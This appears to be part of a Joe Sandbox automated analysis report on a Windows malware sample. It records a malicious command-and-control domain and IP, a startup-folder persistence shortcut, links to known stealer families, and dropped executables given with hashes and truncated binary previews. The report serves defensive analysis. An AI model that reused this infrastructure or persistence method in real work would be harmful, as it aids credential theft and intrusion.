http://www.vmware.com/0/	ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0	cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor	BkTwXj17DH.exe, 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmp, BkTwXj17DH.exe, 00000000.00000000.1415495894.000000000050B000.00000002.00000001.01000000.00000003.sdmp, BkTwXj17DH.exe, 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmp, BkTwXj17DH.exe, 00000002.00000000.1420259549.0000000000D9B000.00000002.00000001.01000000.00000005.sdmp	false		high
http://www.???.xx/?search=%s	ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.color.org)	ActiveISO.exe, 00000003.00000002.1466012295.00007FFBAA858000.00000002.00000001.01000000.00000010.sdmp, ActiveISO.exe, 00000004.00000002.1533059618.00007FFBA8CB8000.00000002.00000001.01000000.00000016.sdmp	false		high
http://www.ntfs.com/iso_file_manager.htm	ActiveISO.exe, 00000004.00000000.1455531882.00007FF7F4173000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://bugreports.qt.io/_q_receiveReplyMicrosoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogi	ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.thawte.com/cps0/	ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.lsoft.net/act/We	ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.lsoft.net/act/	ActiveISO.exe, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://www.info-zip.org/	ActiveISO.exe, 00000003.00000002.1461341393.000001918DDBB000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B25570C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002637000.00000004.00000001.00020000.00000000.sdmp	false		high
http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%3	ActiveISO.exe, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	UploadAlt_Ti.exe, 00000009.00000002.2018894272.00000000083C8000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.surfok.de/	UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com	ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://appsyndication.org/2006/appsyn	BkTwXj17DH.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	sirnisirlo.online	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1556013
Start date and time:	2024-11-14 19:56:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BkTwXj17DH.exe renamed because original name is a hash value
Original Sample Name:	baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6.exe
Detection:	MAL
Classification:	mal100.spyw.expl.evad.winEXE@22/35@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 95% Number of executed functions: 115 Number of non-executed functions: 274
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ActiveISO.exe, PID 7880 because there are no executed function
Execution Graph export aborted for target ActiveISO.exe, PID 7904 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: BkTwXj17DH.exe

Simulations

Behavior and APIs

Time	Type	Description
13:57:05	API Interceptor	1x Sleep call for process: BkTwXj17DH.exe modified
13:57:28	API Interceptor	2x Sleep call for process: cmd.exe modified
13:57:36	API Interceptor	23x Sleep call for process: UploadAlt_Ti.exe modified
19:57:26	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fmDaemonhfr.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/graylinelaketahoe.com&c=E,1,BWhR2At2OZAdw2Kzdn7d-U-fLZRdgzpdTFbcA87JOQxek-SzsLBqKBG-KMVpA5JovWFRbO4mN3q2zPe1YDaTOG57b4G9v05-IgsJXqrG4om_58_65Os9ldlZ&typo=1	Get hash	malicious	Unknown	Browse	graylinelaketahoe.com/
	View Pdf Doc_a42d45ecadd4b9604949c99fe71e46fe.htm	Get hash	malicious	Unknown	Browse	jssqm.nhgrt.top/WjBkrg/34JSSQm34?&&2yq=bC5zY2FybGF0ZWxsaUBhbG1hdml2YS5pdA%3D%3D
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	www.rtpwslot888gol.sbs/7arg/
	Yeni sipari#U015f _TR-59647-WJO-001.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/lmTya
	View Pdf Doc_1c854e0875fca437af9ba7046d2f6712.htm	Get hash	malicious	Unknown	Browse	zy8wq.nhgrt.top/DydymQ/31zY8wQ31?&&r4n=Z2FicmllbGUuY29uZ2Vkb0BnZi5jb20%3D
	View Pdf Doc_8a3c334133bfb9605fc344b2f764ac62.htm	Get hash	malicious	Unknown	Browse	4je3f.nhgrt.top/V0afhB/154jE3f15?&&wVd=dGFoZXIubWFuc29vckB5YXNtYXJpbmEuYWU%3D
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	lysyvan.com/login.php
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	qegyhig.com/login.php
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	qegyhig.com/login.php
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	lysyvan.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sirnisirlo.online	TVr2Z822J3.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
sirnisirlo.online	Rechnung_2024_0091.pdf.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	TVr2Z822J3.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	chelentano.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.80.55
	file.exe	Get hash	malicious	Unknown	Browse	104.21.71.28
	file.exe	Get hash	malicious	Unknown	Browse	104.21.71.28
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.174.133
	http://loop.net.pk/cos.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.25.14
	https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/graylinelaketahoe.com&c=E,1,BWhR2At2OZAdw2Kzdn7d-U-fLZRdgzpdTFbcA87JOQxek-SzsLBqKBG-KMVpA5JovWFRbO4mN3q2zPe1YDaTOG57b4G9v05-IgsJXqrG4om_58_65Os9ldlZ&typo=1	Get hash	malicious	Unknown	Browse	104.17.25.14
	Unit 2_week 4 2024.pptx	Get hash	malicious	HTMLPhisher	Browse	104.25.144.42
	http://samobile.net/content/offsite_article.html?url=https%3A%2F%2Fsepedatua.com%2F158983%2Fsecure-redirect%23cnichols%2Bderickdermatology.com&headline=New+Jerusalem%2C+The+by+Chesterton%2C+G.+K	Get hash	malicious	Captcha Phish	Browse	104.26.5.39

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	TVr2Z822J3.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Nexol.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Loader.exe.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	TVr2Z822J3.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	9nobq4rqr0.exe	Get hash	malicious	Unknown	Browse
	KClGcCpDAP.exe	Get hash	malicious	Unknown	Browse
	KClGcCpDAP.exe	Get hash	malicious	Unknown	Browse
	46L03o2EOY.exe	Get hash	malicious	Unknown	Browse
	46L03o2EOY.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\1ebe34d1

Download File

Process:	C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
File Type:	data
Category:	dropped
Size (bytes):	5682854
Entropy (8bit):	7.7445375728859425
Encrypted:	false
SSDEEP:	49152:D2HV2MATMdnCCL06QQhu6gKsd5yl4Rste4fVaGcbGfvcbM1vhBb040L3DHN4dRJz:qEURJ067t6Rd4fzcSsu0LedROpHMiCD
MD5:	0A0CFA20C87399F6B6CF963D7FAC8A60
SHA1:	8E0B873F8D1857BB1717A433E7D7A3E6769A495E
SHA-256:	2470E79BC37C90ABBDD66037B8791AE7BE63695AF4EF30E73189D93CB63F603E
SHA-512:	D9502CD9712A70B1055588FB3322E9E431D7B090B4FD42792A9FE9736471F29CFCEA58C6790D83DC92887E1745EF9B6895DFD923D6F2B6F5FB741436DEF779A4
Malicious:	false
Preview:	.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................

C:\Users\user\AppData\Local\Temp\2f360cd0

Download File

Process:	C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
File Type:	data
Category:	dropped
Size (bytes):	5682854
Entropy (8bit):	7.744537654222261
Encrypted:	false
SSDEEP:	49152:r2HV2MATMdnCCL06QQhu6gKsd5yl4Rste4fVaGcbGfvcbM1vhBb040L3DHN4dRJz:SEURJ067t6Rd4fzcSsu0LedROpHMiCD
MD5:	4CC768A08250C2C3EE9F5517C6E1E2B4
SHA1:	A6A67665F042C028B885D0AAE313A932A4EFC4D5
SHA-256:	0431E05094AF14FC6E219B59E110DCA74965C74C520C0EEE03DC9E8244C0BF80
SHA-512:	8044FFD5E14547EFD8C660901CBCA2802F22586CEA302E60C60B6FF64E57D0AE3983B5903FE840A819915C0EC7167C23CCF14AADED9DFF9C6301B7DC01EA5EF3
Malicious:	false
Preview:	.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................

C:\Users\user\AppData\Local\Temp\3713da8f

Download File

Process:	C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
File Type:	data
Category:	dropped
Size (bytes):	5682854
Entropy (8bit):	7.744537621825815
Encrypted:	false
SSDEEP:	49152:F2HV2MATMdnCCL06QQhu6gKsd5yl4Rste4fVaGcbGfvcbM1vhBb040L3DHN4dRJz:MEURJ067t6Rd4fzcSsu0LedROpHMiCD
MD5:	BEB274B24FB00576519868A7ECB25C55
SHA1:	8B45B932AE6FD2FBF4C3ED697D2400410B194E53
SHA-256:	10A1E1F79DA05B98DC0D6505269749A2E02E67FB6618811FA5F5FED65C8EC360
SHA-512:	DF56D12BEB47C8B0F4F670D240FCC515C14D7D17A6CC835AC68AE92A52A33F94FE9275D845DE3106F3488CEE92401F4CCEC826AC0B8F8D026505E0667CE23D8B
Malicious:	false
Preview:	.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................

C:\Users\user\AppData\Local\Temp\Cermet_20241114135705.log

Download File

Process:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	970
Entropy (8bit):	5.485331087656056
Encrypted:	false
SSDEEP:	24:pbAIeLLzyIPGdj9cP2NcP261gcP2tTeg1gcP2ZQ1gcP2y:JxYQjcFX13Kag13L13B
MD5:	968C265A5554071C6FD8F10711FC1442
SHA1:	A606A6051BF8F8CC3C24489137D3E7DC83EEE2C9
SHA-256:	718E9DFAA81044BBD1005F9DD62ED9DFB42D0679B39F5C1C0FAE765AD3144846
SHA-512:	773DDE276F29E5F4331E5F4D51CCB9DF3029AF000078F41DF7DFB9C759AD472113F01091AE906517A3F75E166F13E8BB79DB671331B22149AABFC43EB229379A
Malicious:	false
Preview:	[1E94:1E98][2024-11-14T13:57:03]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe..[1E94:1E98][2024-11-14T13:57:03]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\BkTwXj17DH.exe -burn.filehandle.attached=516 -burn.filehandle.self=524'..[1E94:1E98][2024-11-14T13:57:03]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\BkTwXj17DH.exe'..[1E94:1E98][2024-11-14T13:57:03]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1E94:1E98][2024-11-14T13:57:05]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Cermet_20241114135705.log'..[1E94:1E98][2024-11-14T13:57:05]i000: Setting string variable 'WixBundleName' to value 'Cermet'..[1E94:1E98][2024-11-14T13:57:05]i000: Setting string variable 'WixBundleManufacturer' to value 'Tuft'..

C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: TVr2Z822J3.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 9nobq4rqr0.exe, Detection: malicious, Browse Filename: KClGcCpDAP.exe, Detection: malicious, Browse Filename: KClGcCpDAP.exe, Detection: malicious, Browse Filename: 46L03o2EOY.exe, Detection: malicious, Browse Filename: 46L03o2EOY.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dykhaneiil

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2585600
Entropy (8bit):	6.728243363629715
Encrypted:	false
SSDEEP:	49152:WYWawsWHE3JbN9oY8941biXwdrhm1Pl9TSTEProLscZiPDRreY+snri31:Mfsnth+pEoRzqF
MD5:	B77FD7253CE6BC01965036DF941C6354
SHA1:	5B8EB2DB969DD8494D2C1F0A3545EE3656A72158
SHA-256:	AA95DEFB0D2484022E2B2390ACDDCEB9B3ACB5A81D0E217D65B7FF19A464FC36
SHA-512:	B39A891FED4F576441F3CCF748D529E4CB85C6E47EE9780C2705FDA6D1033405DC2AB2A7F64B47336955E4FB571DF9F5B06FA8B558F0F71B9EF1951D0DCBAD2E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......V..................$..X'..b..W..........@.............................`.......6(...`... ...............................................-...... ..8.....&..i...........0...............................&.(...................p.-..............................text...X.$.......$.................`..`.data.........%.......$.............@....rdata.......&.......%.............@..@.pdata...i....&..j....&.............@..@.xdata...Q... '..R....&.............@..@.bss.... a....'..........................idata........-......L'.............@....CRT....0............R'.............@....tls.................T'.............@....rsrc...8.... .......V'.............@..@.reloc.......0.......X'.............@..Bufeo..... ...@.......\'.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\tlwqrc

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 14 17:57:06 2024, mtime=Thu Nov 14 17:57:07 2024, atime=Tue Nov 12 16:27:34 2024, length=1266616, window=hide
Category:	dropped
Size (bytes):	927
Entropy (8bit):	5.003004564589709
Encrypted:	false
SSDEEP:	12:8O1w4vkChJY//jdGLsjwI+Q0MyRKiH24MzjAywHokHRUJBrKifeCmV:8Obs5bakw5RKibMXAynORUTKifeCm
MD5:	74F3F300A70B69F14A91EB047156D34B
SHA1:	AA00DFCA4709DE848F88CDB2ABA186774E8A165F
SHA-256:	03DDEDFE013E10CAA20E1AC44DB756ED80D0800577B378C5A6F482DF402BEC1F
SHA-512:	C68CD0F5A7B9B9B88E5C41D4747E82490A4B6B610A9DD9DE6D1B9CE091B173DEAEFD484D83D9472D09CFA8D17DD8AE772EFA8F0ED9CCC327EBA0D51B03A051D6
Malicious:	false
Preview:	L..................F.... ...P....6.......6.....((5...S........................:..DG..Yr?.D..U..k0.&...&.......y.Yd...\.a..6..M.^..6......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BnY!...........................d...A.p.p.D.a.t.a...B.V.1.....nY$...Roaming.@......EW)BnY$............................)..R.o.a.m.i.n.g.....h.1.....nY$...MONITO~1..P......nY$.nY$......).....................U..M.o.n.i.t.o.r.B.r.o.w.s.e.r.2.....h.2..S..lYq. .ACTIVE~1.EXE..L......nY$.nY$......)........................A.c.t.i.v.e.I.S.O...e.x.e.......l...............-.......k...........~*\D.....C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe..+.....\.....\.R.o.a.m.i.n.g.\.M.o.n.i.t.o.r.B.r.o.w.s.e.r.2.\.A.c.t.i.v.e.I.S.O...e.x.e.`.......X.......216865...........hT..CrF.f4... ..I..Yc...,...E...hT..CrF.f4... ..I..Yc...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\xsnxlhd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2585600
Entropy (8bit):	6.728243363629715
Encrypted:	false
SSDEEP:	49152:WYWawsWHE3JbN9oY8941biXwdrhm1Pl9TSTEProLscZiPDRreY+snri31:Mfsnth+pEoRzqF
MD5:	B77FD7253CE6BC01965036DF941C6354
SHA1:	5B8EB2DB969DD8494D2C1F0A3545EE3656A72158
SHA-256:	AA95DEFB0D2484022E2B2390ACDDCEB9B3ACB5A81D0E217D65B7FF19A464FC36
SHA-512:	B39A891FED4F576441F3CCF748D529E4CB85C6E47EE9780C2705FDA6D1033405DC2AB2A7F64B47336955E4FB571DF9F5B06FA8B558F0F71B9EF1951D0DCBAD2E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......V..................$..X'..b..W..........@.............................`.......6(...`... ...............................................-...... ..8.....&..i...........0...............................&.(...................p.-..............................text...X.$.......$.................`..`.data.........%.......$.............@....rdata.......&.......%.............@..@.pdata...i....&..j....&.............@..@.xdata...Q... '..R....&.............@..@.bss.... a....'..........................idata........-......L'.............@....CRT....0............R'.............@....tls.................T'.............@....rsrc...8.... .......V'.............@..@.reloc.......0.......X'.............@..Bufeo..... ...@.......\'.............@...................................................................................................................................

C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe

Download File

Process:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1266616
Entropy (8bit):	6.275567294044985
Encrypted:	false
SSDEEP:	12288:RWiPQmboElHjsxc93LwnfXlP0CT7T4ir7XFXTqlj02F:5Qrat3knTvT4yDpqlj/F
MD5:	B84DFABE933D1160F624693D94779CE5
SHA1:	AC0133C09708FE4A3C626E3BA4CDF44D3A0E065F
SHA-256:	588CB61B36A001384A2833BD5DF8D7982CA79D6AE17A3D83A94E01B1E79684BD
SHA-512:	EEAEEF8D6B5FA02DEDF9818BABAA4B5FFDB87300521883AA290289DCC720B3D543279085ED3FC649B74654143E678502E56EB3F92C4BAF53C075977DE33C1B0E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........s..G..CG..CG..C.n.CF..C.n.BX..C.n.BM..C.n.BC..C.n.BA..C.L.BF..C.L.BM..CSy.BO..CNjpCS..CG..Cu..C..(CD..C.L.BQ..C.L.BM..C.o.B`..C.o.CF..CG.tCF..C.o.BF..CRichG..C........................PE..d....~.e.........."....#.....<.................@.....................................y....`.............................................................8........>...(...+...`..................................(...@...@............0...)...........................text............................... ..`.rdata..0....0......................@..@.data....w.......L..................@....pdata...>.......@...D..............@..@.rsrc...8...........................@..@.reloc.......`......................@..B........................................................................................................................................................................................

